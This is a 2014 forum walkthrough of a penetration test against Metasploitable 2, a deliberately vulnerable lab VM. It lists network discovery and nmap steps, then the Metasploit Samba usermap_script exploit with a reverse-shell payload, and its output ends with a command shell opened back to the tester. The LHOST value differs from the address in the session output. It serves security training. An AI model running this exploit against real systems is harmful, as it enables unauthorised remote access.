Pentest on Metasploitable 2

crossbower · February 1, 2014

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms.

root@kali:~# netdiscover -i wlan1 -r 192.168.1.1/24
 Currently scanning: 192.168.1.0/24   |   Screen View: Unique Hosts            

 8 Captured ARP Req/Rep packets, from 8 hosts.   Total size: 372              
 __________________________________________________  ___________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.1.91    08:00:27:4a:6c:50    01    042   CADMUS COMPUTER SYSTEMS      
 192.168.1.202   08:00:27:32:43:96    01    042   CADMUS COMPUTER SYSTEMS      
 192.168.1.1     00:25:53:3e:bc:b9    01    042   Unknown vendor              
 192.168.1.100   00:09:f8:65:35:64    01    060   UNIMO TECHNOLOGY CO., LTD.  
 192.168.1.132   00:21:9b:20:a3:bb    01    060   Unknown vendor

Using nmap scanner for identif. port 139 Samba service.

root@kali:~# nmap -p 139 -sV 192.168.1.91

Starting Nmap 6.40 ( http://nmap.org )
Nmap scan report for 192.168.1.91
Host is up (0.00017s latency).
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:4A:6C:50 (Cadmus Computer Systems)

And play game :

root@kali:~# service postgresql start && service metasploit start && msfconsole

msf > use exploit/multi/samba/usermap_script
msf  exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf exploit(usermap_script) > set RHOST 192.168.1.91
RHOST => 192.168.1.91
msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(usermap_script) > set LHOST 191.168.1.19
LHOST => 191.168.1.19
msf exploit(usermap_script) >
msf  exploit(usermap_script) > exploit

[

*] Started reverse double handler[*] Accepted the first client connection...[*] Accepted the second client connection...[*] Command: echo BgB1yKJSt3wbArQy;[*] Writing to socket A[*] Writing to socket B[*] Reading from sockets...[*] Reading from socket A[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command
not found\r\nBgB1yKJSt3wbArQy\r\n[*] Matching...[*] B is input...[*] Command shell session 1 opened (192.168.1.19:4444 -> 192.168.1.91:42504)

VIDEO TUT

http://www.youtube.com/watch?v=S3uvS3qEpm8

Edited February 2, 2014 by crossbower

Sign In

Pentest on Metasploitable 2

Recommended Posts

crossbower

Join the conversation

Browse

Activity

Pages